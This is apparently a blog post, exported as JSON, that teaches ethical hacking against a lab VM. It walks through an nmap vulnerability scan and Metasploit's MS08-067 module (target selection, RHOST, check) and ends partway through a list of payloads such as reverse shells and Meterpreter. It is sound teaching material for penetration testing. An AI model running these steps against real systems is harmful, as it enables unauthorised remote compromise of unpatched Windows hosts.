{"id":1803,"date":"2019-03-04T15:26:37","date_gmt":"2019-03-04T14:26:37","guid":{"rendered":"https:\/\/christeninformatica.ch\/?p=1803"},"modified":"2023-05-09T06:43:12","modified_gmt":"2023-05-09T04:43:12","slug":"testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking","status":"publish","type":"post","link":"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","title":{"rendered":"Ethical Hacking &#8211; Testing Security &#8211; Nmap and Metasploit"},"content":{"rendered":"<p>In this example we will test the <b>security<\/b> of a hypothetical client on the network running an old, unpatched operating system. The IP address of the client under test is 10.10.10.7; its operating system is Windows XP PRO SP3 and it is not updated. I deliberately chose an old, unpatched system to make the exercise easier to prepare and to be sure of finding serious <b>vulnerabilities<\/b> to &#8220;exploit&#8221;; the procedure is nevertheless the same with more modern systems.<\/p>\n<h2>Vulnerability scan with Nmap<\/h2>\n<div class=\"comandi\">\n<blockquote>\n<pre>workstation:\/home\/chit # nmap --script vuln 10.10.10.7\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-03-02 01:12 CET\nNmap scan report for 10.10.10.7\nHost is up (0.00032s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE\n135\/tcp open  msrpc\n139\/tcp open  netbios-ssn\n445\/tcp open  microsoft-ds\nMAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)\n\nHost script results:\n|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED\n| smb-vuln-ms08-067:\n|   VULNERABLE:\n|   Microsoft Windows system vulnerable to remote code execution (MS08-067)\n|     State: VULNERABLE\n|     IDs:  CVE:CVE-2008-4250\n|           The 
Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\n|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\n|           code via a crafted RPC request that triggers the overflow during path canonicalization.\n|\n|     Disclosure date: 2008-10-23\n|     References:\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms08-067.aspx\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2008-4250\n|_smb-vuln-ms10-054: false\n|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)\n| smb-vuln-ms17-010:\n|   VULNERABLE:\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n|     State: VULNERABLE\n|     IDs:  CVE:CVE-2017-0143\n|     Risk factor: HIGH\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\n|        servers (ms17-010).\n|\n|     Disclosure date: 2017-03-14\n|     References:\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\n|_      https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\n\nNmap done: 1 IP address (1 host up) scanned in 41.40 seconds\nworkstation:\/home\/chit #\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>To detect the operating system in use, use the -O option of <b>Nmap<\/b>.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>workstation:\/home\/chit # nmap -O 10.10.10.7\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-03-03 19:16 CET\nNmap scan report for 10.10.10.7\nHost is up (0.00038s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE\n135\/tcp open  msrpc\n139\/tcp open  netbios-ssn\n445\/tcp open  microsoft-ds\nMAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Microsoft Windows XP|2003\nOS CPE: cpe:\/o:microsoft:windows_xp 
cpe:\/o:microsoft:windows_server_2003\nOS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2\nNetwork Distance: 1 hop\n\nOS detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 27.83 seconds\nworkstation:\/home\/chit #\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>As the scan results show, <b>Nmap<\/b> found two serious <b>vulnerabilities<\/b> in the tested system and identified the operating system in use (Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2). For this example I created a virtual machine, so I know that the target in question is Microsoft Windows XP SP3 Italian. The <b>vulnerability<\/b> we will look at in detail and \u201cexploit\u201d is \u201cMS08-067\u201d. It is a vulnerability that allows commands to be executed remotely on the targeted system.<\/p>\n<h2>Exploiting vulnerabilities automatically with Metasploit<\/h2>\n<p>Now that we have identified and chosen the <b>vulnerability<\/b> to &#8220;exploit&#8221;, we move on to <b>Metasploit<\/b>. With <b>Metasploit<\/b> it is possible to \u201cexploit\u201d applications automatically, without having to look for <b>exploits<\/b> in online databases.<\/p>\n<h3>Metasploit &#8211; Search module<\/h3>\n<p>Once <b>Metasploit<\/b> has started, search for the <b>exploit<\/b> with the following command: \u201c<b>search MS08-067<\/b>\u201d. 
<b>Metasploit<\/b> will show the modules it finds.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf &gt; search ms08-067\n\nMatching Modules\n================\n\n   Name                                 Disclosure Date  Rank   Description\n   ----                                 ---------------  ----   -----------\n   exploit\/windows\/smb\/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption\n\n\nmsf &gt; \n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>Metasploit &#8211; Use<\/h3>\n<p>To use a module, run \u201cuse\u201d followed by the module name, as follows:<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf &gt; use exploit\/windows\/smb\/ms08_067_netapi\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>Metasploit &#8211; Show and set target<\/h3>\n<p>To see the list of targets for the exploit, run the <b>show targets<\/b> command.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; show targets\n\nExploit targets:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n   1   Windows 2000 Universal\n   2   Windows XP SP0\/SP1 Universal\n   3   Windows 2003 SP0 Universal\n   4   Windows XP SP2 English (AlwaysOn NX)\n   5   Windows XP SP2 English (NX)\n   6   Windows XP SP3 English (AlwaysOn NX)\n   7   Windows XP SP3 English (NX)\n   8   Windows XP SP2 Arabic (NX)\n   9   Windows XP SP2 Chinese - Traditional \/ Taiwan (NX)\n   10  Windows XP SP2 Chinese - Simplified (NX)\n   11  Windows XP SP2 Chinese - Traditional (NX)\n   12  Windows XP SP2 Czech (NX)\n   13  Windows XP SP2 Danish (NX)\n   14  Windows XP SP2 German (NX)\n   15  Windows XP SP2 Greek (NX)\n   16  Windows XP SP2 Spanish (NX)\n   17  Windows XP SP2 Finnish (NX)\n   18  Windows XP SP2 French (NX)\n   19  Windows XP SP2 Hebrew (NX)\n   20  Windows XP SP2 Hungarian (NX)\n   21  Windows XP SP2 Italian (NX)\n   22  Windows XP SP2 Japanese (NX)\n   23  
Windows XP SP2 Korean (NX)\n   24  Windows XP SP2 Dutch (NX)\n   25  Windows XP SP2 Norwegian (NX)\n   26  Windows XP SP2 Polish (NX)\n   27  Windows XP SP2 Portuguese - Brazilian (NX)\n   28  Windows XP SP2 Portuguese (NX)\n   29  Windows XP SP2 Russian (NX)\n   30  Windows XP SP2 Swedish (NX)\n   31  Windows XP SP2 Turkish (NX)\n   32  Windows XP SP3 Arabic (NX)\n   33  Windows XP SP3 Chinese - Traditional \/ Taiwan (NX)\n   34  Windows XP SP3 Chinese - Simplified (NX)\n   35  Windows XP SP3 Chinese - Traditional (NX)\n   36  Windows XP SP3 Czech (NX)\n   37  Windows XP SP3 Danish (NX)\n   38  Windows XP SP3 German (NX)\n   39  Windows XP SP3 Greek (NX)\n   40  Windows XP SP3 Spanish (NX)\n   41  Windows XP SP3 Finnish (NX)\n   42  Windows XP SP3 French (NX)\n   43  Windows XP SP3 Hebrew (NX)\n   44  Windows XP SP3 Hungarian (NX)\n   45  Windows XP SP3 Italian (NX)\n   46  Windows XP SP3 Japanese (NX)\n   47  Windows XP SP3 Korean (NX)\n   48  Windows XP SP3 Dutch (NX)\n   49  Windows XP SP3 Norwegian (NX)\n   50  Windows XP SP3 Polish (NX)\n   51  Windows XP SP3 Portuguese - Brazilian (NX)\n   52  Windows XP SP3 Portuguese (NX)\n   53  Windows XP SP3 Russian (NX)\n   54  Windows XP SP3 Swedish (NX)\n   55  Windows XP SP3 Turkish (NX)\n   56  Windows 2003 SP1 English (NO NX)\n   57  Windows 2003 SP1 English (NX)\n   58  Windows 2003 SP1 Japanese (NO NX)\n   59  Windows 2003 SP1 Spanish (NO NX)\n   60  Windows 2003 SP1 Spanish (NX)\n   61  Windows 2003 SP1 French (NO NX)\n   62  Windows 2003 SP1 French (NX)\n   63  Windows 2003 SP2 English (NO NX)\n   64  Windows 2003 SP2 English (NX)\n   65  Windows 2003 SP2 German (NO NX)\n   66  Windows 2003 SP2 German (NX)\n   67  Windows 2003 SP2 Portuguese - Brazilian (NX)\n   68  Windows 2003 SP2 Spanish (NO NX)\n   69  Windows 2003 SP2 Spanish (NX)\n   70  Windows 2003 SP2 Japanese (NO NX)\n   71  Windows 2003 SP2 French (NO NX)\n   72  Windows 2003 SP2 French (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt; 
\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>In most cases there is clearly no need to choose the target: <b>Metasploit<\/b> detects the operating system in use automatically. So leave it on 0, automatic.<\/p>\n<p>If you ever need to set the target manually, use the following command:<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; set target 45\ntarget =&gt; 45\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt; show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    \t\t     yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3><b>Metasploit<\/b> &#8211; Show options<\/h3>\n<p>The remaining settings needed to run the <b>exploit<\/b> successfully are shown by the &#8220;<b>show options<\/b>&#8221; command.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST                     yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h4>Metasploit module option RHOST<\/h4>\n<p>Rhost, 
which stands for remote host, is the host to attack\/test, in this example the IP address 10.10.10.7.<\/p>\n<h4>Metasploit module option RPORT<\/h4>\n<p>Rport (Remote Port) is filled in automatically by Metasploit because port 445 is the standard port of the application to &#8220;exploit&#8221;. In most cases leave it as it is.<\/p>\n<h4>Metasploit module option SMBPIPE<\/h4>\n<p>As with the port (RPORT), leave the default setting, BROWSER.<\/p>\n<h3>Metasploit &#8211; Set RHOST<\/h3>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; set rhost 10.10.10.7\nrhost =&gt; 10.10.10.7\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<p>Whenever you change a setting, you can use the &#8220;show options&#8221; command to check that the change was applied successfully.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>Metasploit &#8211; Check<\/h3>\n<p>Once the settings required for the <b>exploit<\/b> to run correctly have been entered, you can check whether the host is <b>vulnerable<\/b> to an attack with the check command.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; check\n[+] 10.10.10.7:445 The target is vulnerable.\nmsf 
exploit(windows\/smb\/ms08_067_netapi) &gt;\n<\/pre>\n<\/blockquote>\n<\/div>\n<h3>Metasploit &#8211; Payloads<\/h3>\n<p>We are not finished yet: we now have to tell <b>Metasploit<\/b> what to do once the target has been &#8220;<b>exploited<\/b>&#8221;. Simply choose a compatible payload to run after the exploit has succeeded.<\/p>\n<h4>Metasploit &#8211; Show payloads<\/h4>\n<p>To see the list of compatible <b>payloads<\/b> available for this module, run the &#8220;<b>show payloads<\/b>&#8221; command.<\/p>\n<div class=\"comandi\">\n<blockquote>\n<pre>msf exploit(windows\/smb\/ms08_067_netapi) &gt; show payloads\n\nCompatible Payloads\n===================\n\n   Name                                                Disclosure Date  Rank    Description\n   ----                                                ---------------  ----    -----------\n   generic\/custom                                                       normal  Custom Payload\n   generic\/debug_trap                                                   normal  Generic x86 Debug Trap\n   generic\/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline\n   generic\/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline\n   generic\/tight_loop                                                   normal  Generic x86 Tight Loop\n   windows\/adduser                                                      normal  Windows Execute net user \/ADD\n   windows\/dllinject\/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager\n   windows\/dllinject\/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager\n   windows\/dllinject\/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)\n   
windows\/dllinject\/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/dllinject\/bind_named_pipe                                    normal  Reflective DLL Injection, Windows x86 Bind Named Pipe Stager\n   windows\/dllinject\/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)\n   windows\/dllinject\/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)\n   windows\/dllinject\/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/dllinject\/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/dllinject\/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP\/HTTPS Stager\n   windows\/dllinject\/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)\n   windows\/dllinject\/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)\n   windows\/dllinject\/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)\n   windows\/dllinject\/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/dllinject\/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager\n   windows\/dllinject\/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager\n   windows\/dllinject\/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP 
Stager (DNS)\n   windows\/dllinject\/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/dllinject\/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support\n   windows\/dllinject\/reverse_udp                                        normal  Reflective DLL Injection, Reverse UDP Stager with UUID Support\n   windows\/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution\n   windows\/exec                                                         normal  Windows Execute Command\n   windows\/format_all_drives                                            manual  Windows Drive Formatter\n   windows\/loadlibrary                                                  normal  Windows LoadLibrary Path\n   windows\/messagebox                                                   normal  Windows MessageBox\n   windows\/meterpreter\/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager\n   windows\/meterpreter\/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager\n   windows\/meterpreter\/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)\n   windows\/meterpreter\/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/meterpreter\/bind_named_pipe                                  normal  Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager\n   windows\/meterpreter\/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)\n   
windows\/meterpreter\/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)\n   windows\/meterpreter\/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/meterpreter\/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/meterpreter\/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP\/HTTPS Stager\n   windows\/meterpreter\/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)\n   windows\/meterpreter\/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)\n   windows\/meterpreter\/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy\n   windows\/meterpreter\/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)\n   windows\/meterpreter\/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager\n   windows\/meterpreter\/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/meterpreter\/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/meterpreter\/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n   
windows\/meterpreter\/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager\n   windows\/meterpreter\/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)\n   windows\/meterpreter\/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/meterpreter\/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support\n   windows\/meterpreter\/reverse_udp                                      normal  Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support\n   windows\/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP\n   windows\/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline\n   windows\/patchupdllinject\/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager\n   windows\/patchupdllinject\/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager\n   windows\/patchupdllinject\/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)\n   windows\/patchupdllinject\/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/patchupdllinject\/bind_named_pipe                             normal  Windows Inject DLL, Windows x86 Bind Named Pipe Stager\n   windows\/patchupdllinject\/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/bind_tcp                                    normal  Windows Inject DLL, Bind TCP 
Stager (Windows x86)\n   windows\/patchupdllinject\/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupdllinject\/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/patchupdllinject\/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)\n   windows\/patchupdllinject\/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager\n   windows\/patchupdllinject\/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager\n   windows\/patchupdllinject\/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)\n   windows\/patchupdllinject\/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupdllinject\/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support\n   windows\/patchupdllinject\/reverse_udp                                 normal  Windows Inject DLL, Reverse UDP Stager with UUID Support\n   windows\/patchupmeterpreter\/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape\/jt Injection), Hidden Bind Ipknock TCP Stager\n   windows\/patchupmeterpreter\/bind_hidden_tcp                           normal  Windows Meterpreter (skape\/jt Injection), Hidden Bind TCP Stager\n   windows\/patchupmeterpreter\/bind_ipv6_tcp                             normal  Windows Meterpreter (skape\/jt Injection), Bind IPv6 TCP 
Stager (Windows x86)\n   windows\/patchupmeterpreter\/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape\/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/patchupmeterpreter\/bind_named_pipe                           normal  Windows Meterpreter (skape\/jt Injection), Windows x86 Bind Named Pipe Stager\n   windows\/patchupmeterpreter\/bind_nonx_tcp                             normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/bind_tcp                                  normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (Windows x86)\n   windows\/patchupmeterpreter\/bind_tcp_rc4                              normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupmeterpreter\/bind_tcp_uuid                             normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/patchupmeterpreter\/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (IPv6)\n   windows\/patchupmeterpreter\/reverse_nonx_tcp                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/reverse_ord_tcp                           normal  Windows Meterpreter (skape\/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/reverse_tcp                               normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager\n   windows\/patchupmeterpreter\/reverse_tcp_allports                      normal  Windows Meterpreter (skape\/jt Injection), Reverse All-Port TCP Stager\n   windows\/patchupmeterpreter\/reverse_tcp_dns                           normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (DNS)\n   
windows\/patchupmeterpreter\/reverse_tcp_rc4                           normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupmeterpreter\/reverse_tcp_uuid                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager with UUID Support\n   windows\/patchupmeterpreter\/reverse_udp                               normal  Windows Meterpreter (skape\/jt Injection), Reverse UDP Stager with UUID Support\n   windows\/shell\/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager\n   windows\/shell\/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager\n   windows\/shell\/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)\n   windows\/shell\/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/shell\/bind_named_pipe                                        normal  Windows Command Shell, Windows x86 Bind Named Pipe Stager\n   windows\/shell\/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)\n   windows\/shell\/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)\n   windows\/shell\/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/shell\/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/shell\/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)\n   windows\/shell\/reverse_nonx_tcp                                       normal 
 Windows Command Shell, Reverse TCP Stager (No NX or Win7)\n   windows\/shell\/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/shell\/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager\n   windows\/shell\/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager\n   windows\/shell\/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)\n   windows\/shell\/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/shell\/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support\n   windows\/shell\/reverse_udp                                            normal  Windows Command Shell, Reverse UDP Stager with UUID Support\n   windows\/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline\n   windows\/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline\n   windows\/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline\n   windows\/speak_pwned                                                  normal  Windows Speech API - Say \"You Got Pwned!\"\n   windows\/upexec\/bind_hidden_ipknock_tcp                               normal  Windows Upload\/Execute, Hidden Bind Ipknock TCP Stager\n   windows\/upexec\/bind_hidden_tcp                                       normal  Windows Upload\/Execute, Hidden Bind TCP Stager\n   windows\/upexec\/bind_ipv6_tcp                                         normal  Windows Upload\/Execute, Bind IPv6 TCP Stager (Windows x86)\n   windows\/upexec\/bind_ipv6_tcp_uuid         
                           normal  Windows Upload\/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/upexec\/bind_named_pipe                                       normal  Windows Upload\/Execute, Windows x86 Bind Named Pipe Stager\n   windows\/upexec\/bind_nonx_tcp                                         normal  Windows Upload\/Execute, Bind TCP Stager (No NX or Win7)\n   windows\/upexec\/bind_tcp                                              normal  Windows Upload\/Execute, Bind TCP Stager (Windows x86)\n   windows\/upexec\/bind_tcp_rc4                                          normal  Windows Upload\/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/upexec\/bind_tcp_uuid                                         normal  Windows Upload\/Execute, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/upexec\/reverse_ipv6_tcp                                      normal  Windows Upload\/Execute, Reverse TCP Stager (IPv6)\n   windows\/upexec\/reverse_nonx_tcp                                      normal  Windows Upload\/Execute, Reverse TCP Stager (No NX or Win7)\n   windows\/upexec\/reverse_ord_tcp                                       normal  Windows Upload\/Execute, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/upexec\/reverse_tcp                                           normal  Windows Upload\/Execute, Reverse TCP Stager\n   windows\/upexec\/reverse_tcp_allports                                  normal  Windows Upload\/Execute, Reverse All-Port TCP Stager\n   windows\/upexec\/reverse_tcp_dns                                       normal  Windows Upload\/Execute, Reverse TCP Stager (DNS)\n   windows\/upexec\/reverse_tcp_rc4                                       normal  Windows Upload\/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/upexec\/reverse_tcp_uuid                                      normal  Windows Upload\/Execute, Reverse TCP Stager with UUID Support\n   
